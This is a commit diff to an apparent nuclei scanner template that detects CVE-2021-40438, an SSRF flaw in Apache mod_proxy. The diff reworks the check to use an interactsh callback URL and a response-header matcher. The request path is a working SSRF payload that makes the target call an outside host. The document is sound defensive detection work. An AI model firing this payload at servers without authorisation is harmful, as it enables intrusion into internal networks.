Fix CVE-2021-40438.yaml

Current implementation of vulnerability check does not detect vulnerable servers. This pr uses randomised interactsh hostname and check response headers for X-Interactsh-Version
2024-03-08 08:45:43 +03:00 · 2024-03-08 08:45:43 +03:00 · 96ce225bc1
parent 7f071a1f5a
commit 96ce225bc1
1 changed files with 4 additions and 7 deletions
--- a/http/cves/2021/CVE-2021-40438.yaml
+++ b/http/cves/2021/CVE-2021-40438.yaml
@ -21,7 +21,7 @@ info:
    epss-percentile: 0.99749
    cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
  metadata:
-    max-request: 2
+    max-request: 1
    vendor: apache
    product: http_server
  tags: cve2021,cve,ssrf,apache,mod-proxy,kev
@ -29,15 +29,12 @@ info:
 http:
  - method: GET
    path:
-      - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{randbase(5)}}.com/'
-      - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://oast.pro/'
+      - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{interactsh-url}}/'

    host-redirects: true
    max-redirects: 2
+
    matchers:
      - type: dsl
        dsl:
-          - "!contains(body_1, '<h1> Interactsh Server </h1>')"
-          - "contains(body_2, '<h1> Interactsh Server </h1>')"
-        condition: and
-# digest: 4a0a00473045022054595b49ba72d99512a0d6ea2cb09a8a9b17077a63d51b94d79025a970c5e470022100b3a313e154e44c770642e0e8874fb62257de71ab53059714c607ec9d2c13a4ed:922c64590222798bb761d5b6d8e72950
+          - contains(header_1, "X-Interactsh-Version")